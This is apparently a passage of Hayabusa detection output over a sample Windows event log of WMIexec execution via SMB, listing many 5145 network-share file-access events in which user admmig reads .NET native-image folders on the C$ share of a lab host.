Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 : IP Address: 
